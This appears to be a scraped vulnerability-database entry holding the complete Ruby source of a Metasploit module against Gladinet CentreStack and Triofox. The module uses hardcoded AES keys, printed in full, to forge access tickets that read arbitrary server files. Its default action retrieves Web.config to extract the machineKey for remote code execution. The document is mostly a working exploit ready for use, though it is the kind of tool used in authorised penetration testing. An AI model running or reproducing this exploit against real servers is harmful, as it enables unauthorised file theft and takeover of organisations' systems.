{“lastseen”:”2026-02-04T19:28:01″,”description”:”This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt access tickets. The access…”,”published”:”2026-02-04T18:58:58″,”modified”:”2026-02-04T18:58:58″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox Access Ticket Forge”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘openssl’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Gladinet\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n # Hardcoded keys extracted from GladCtrl64.dll\\n # SysKey: First 32 UTF-16 characters from DAT_18000c000 converted to UTF-8, then first 32 bytes\\n # SysKey1: First 16 UTF-16 characters from DAT_18000c2c0 converted to UTF-8, then first 16 bytes\\n # These keys are static and identical across all vulnerable installations\\n # Extracted from DAT_18000c000 (SysKey) and DAT_18000c2c0 (SysKey1)\\n # The C code does: memcpy with strlen, but the actual keys used are UTF-16 chars -\\u003e UTF-8 bytes\\n DEFAULT_SYS_KEY = ‘E4B88DE8BF87EFBC8CE8B083E69FA5E4B99FE698BEE7A4BAEFBC8CE697A5E69C’.freeze\\n DEFAULT_SYS_KEY1 = ‘6D6F4472697665E381AFE38081E38389’.freeze\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Gladinet CentreStack\/Triofox Access Ticket Forge’,\\n ‘Description’ =\\u003e %q{\\n This module forges access tickets for the Gladinet CentreStack\/Triofox\\n `\/storage\/filesvr.dn` endpoint. The vulnerability exists because\\n the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt\\n access tickets.\\n\\n The access ticket is an encrypted string that contains:\\n – Filepath: The absolute path to the file on the server\\n – Username: Empty (Application Pool Identity will be used)\\n – Password: Empty\\n – Timestamp: Creation time (set to excessive year to never expire)\\n\\n This module can forge tickets to read arbitrary files from the server’s file system.\\n\\n Gladinet CentreStack versions up to 16.12.10420.56791 are vulnerable.\\n Gladinet Triofox versions up to 16.12.10420.56791 are vulnerable.\\n },\\n ‘Author’ =\\u003e [\\n ‘Huntress Team’, # Vulnerability discovery and analysis\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’, # Metasploit module\\n ‘Julien Voisin’ # Review\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/www.huntress.com\/blog\/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-10’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e []\\n },\\n ‘Actions’ =\\u003e [\\n [‘READ_FILE’, { ‘Description’ =\\u003e ‘Read an arbitrary file from the target’ }],\\n [‘EXTRACT_MACHINEKEY’, { ‘Description’ =\\u003e ‘Read Web.config and extract the machineKey for RCE’ }]\\n ],\\n ‘DefaultAction’ =\\u003e ‘EXTRACT_MACHINEKEY’\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to the Gladinet CentreStack or Triofox application’, ‘\/’]),\\n OptString.new(‘FILEPATH’, [true, ‘Absolute path to the file to read on the target’, ‘C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config’]),\\n OptEnum.new(‘PRODUCT’, [true, ‘Target product type’, ‘CentreStack’, [‘CentreStack’, ‘Triofox’]]),\\n OptString.new(‘SYSKEY’, [true, ‘SysKey (32 bytes) in hex format’, DEFAULT_SYS_KEY]),\\n OptString.new(‘SYSKEY1’, [true, ‘SysKey1 (16 bytes) in hex format’, DEFAULT_SYS_KEY1])\\n ])\\n end\\n\\n def get_sys_key\\n [datastore[‘SYSKEY’]].pack(‘H*’)\\n end\\n\\n def get_sys_key1\\n [datastore[‘SYSKEY1’]].pack(‘H*’)\\n end\\n\\n def generate_timestamp\\n # Generate random timestamp with excessive year (100+ years in future) to never expire\\n # Format: YYYY-MM-DD HH:MM:SS.microseconds\\n current_year = Time.now.year\\n year_min = current_year + 100\\n year_max = current_year + 9999\\n\\n ranges = [\\n [year_min, year_max],\\n [1, 12],\\n [1, 28], # Use 28 to avoid month-specific day issues\\n [0, 23],\\n [0, 59],\\n [0, 59],\\n [0, 999_999]\\n ]\\n values = ranges.map do |min, max|\\n range_size = max – min + 1\\n random_offset = Rex::Text.rand_text_numeric(range_size.to_s.length).to_i % range_size\\n min + random_offset\\n end\\n format(‘%04d-%02d-%02d %02d:%02d:%02d.%06d’, *values)\\n end\\n\\n def forge_ticket(filepath, timestamp = nil)\\n # Build plaintext ticket: Filepath\\\\n\\\\n\\\\nTimestamp (no trailing newline)\\n timestamp ||= generate_timestamp\\n plaintext = \\”#{filepath}\\\\n\\\\n\\\\n#{timestamp}\\”\\n\\n sys_key = get_sys_key\\n sys_key1 = get_sys_key1\\n\\n if sys_key.length != 32\\n fail_with(Failure::BadConfig, \\”SysKey must be exactly 32 bytes, got #{sys_key.length}\\”)\\n end\\n if sys_key1.length != 16\\n fail_with(Failure::BadConfig, \\”SysKey1 must be exactly 16 bytes, got #{sys_key1.length}\\”)\\n end\\n\\n # Encrypt with AES-256-CBC, then Base64 encode with URL-safe encoding (+ -\\u003e :, \/ -\\u003e |)\\n cipher = OpenSSL::Cipher.new(‘AES-256-CBC’)\\n cipher.encrypt\\n cipher.key = sys_key\\n cipher.iv = sys_key1\\n encrypted = cipher.update(plaintext) + cipher.final\\n Rex::Text.encode_base64(encrypted).tr(‘+\/’, ‘:|’)\\n end\\n\\n def check\\n version = gladinet_version\\n return Exploit::CheckCode::Detected(‘Gladinet detected but version could not be determined’) if version.nil?\\n\\n rex_version = Rex::Version.new(version)\\n return Exploit::CheckCode::Vulnerable(\\”Access ticket forge vulnerability confirmed (Build #{version})\\”) if rex_version \\u003c= Rex::Version.new(‘16.12.10420.56791’)\\n\\n Exploit::CheckCode::Appears(\\”Version #{version} detected, attempting ticket forge anyway\\”)\\n end\\n\\n def storage_endpoint\\n # CentreStack and Triofox use different paths\\n case datastore[‘PRODUCT’]\\n when ‘Triofox’\\n normalize_uri(target_uri.path, ‘servlets’, ‘filesvr.dn’)\\n else\\n normalize_uri(target_uri.path, ‘storage’, ‘filesvr.dn’)\\n end\\n end\\n\\n def default_webconfig_path\\n case datastore[‘PRODUCT’]\\n when ‘Triofox’\\n ‘C:\\\\\\\\Program Files (x86)\\\\\\\\Triofox\\\\\\\\root\\\\\\\\Web.config’\\n else\\n ‘C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config’\\n end\\n end\\n\\n def read_file_via_ticket(filepath)\\n print_status(\\”Forging access ticket for file: #{filepath}\\”)\\n ticket = forge_ticket(filepath)\\n\\n print_good(\\”Forged access ticket: #{ticket}\\”)\\n\\n print_status(\\”Sending request to #{storage_endpoint}\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e storage_endpoint,\\n ‘vars_get’ =\\u003e { ‘t’ =\\u003e ticket }\\n })\\n\\n unless res\\u0026.code == 200\\n print_error(\\”Failed to read file. HTTP response code: #{res\\u0026.code}\\”)\\n return nil\\n end\\n\\n ticket_path = store_loot(\\n ‘gladinet.ticket’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n ticket,\\n ‘access_ticket.txt’,\\n ‘Forged access ticket for Gladinet’\\n )\\n print_good(\\”Access ticket saved to: #{ticket_path}\\”)\\n\\n res.body\\n end\\n\\n def run\\n case action.name\\n when ‘READ_FILE’\\n run_read_file\\n when ‘EXTRACT_MACHINEKEY’\\n run_extract_machinekey\\n end\\n end\\n\\n def run_read_file\\n filepath = datastore[‘FILEPATH’]\\n file_content = read_file_via_ticket(filepath)\\n return if file_content.nil?\\n\\n print_good(\\”Successfully read file: #{filepath}\\”)\\n print_line\\n print_line(file_content)\\n print_line\\n\\n fname = File.basename(filepath)\\n path = store_loot(\\n ‘gladinet.file’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n file_content,\\n fname,\\n ‘File read from Gladinet via forged access ticket’\\n )\\n print_good(\\”File saved to: #{path}\\”)\\n end\\n\\n def run_extract_machinekey\\n filepath = datastore[‘FILEPATH’]\\n # Use default Web.config path if the user hasn’t changed FILEPATH\\n if filepath == ‘C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config’\\n filepath = default_webconfig_path\\n end\\n\\n file_content = read_file_via_ticket(filepath)\\n return if file_content.nil?\\n\\n print_good(\\”Successfully read file: #{filepath}\\”)\\n print_line\\n print_line(file_content)\\n print_line\\n\\n fname = File.basename(filepath)\\n path = store_loot(\\n ‘gladinet.file’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n file_content,\\n fname,\\n ‘File read from Gladinet via forged access ticket’\\n )\\n print_good(\\”File saved to: #{path}\\”)\\n\\n handle_machinekey_extraction(file_content, filepath, ‘MachineKey extracted from Gladinet Web.config’)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/gladinet_storage_access_ticket_forge.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/gladinet_storage_access_ticket_forge\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T19:28:01″,”description”:”This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-39103","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n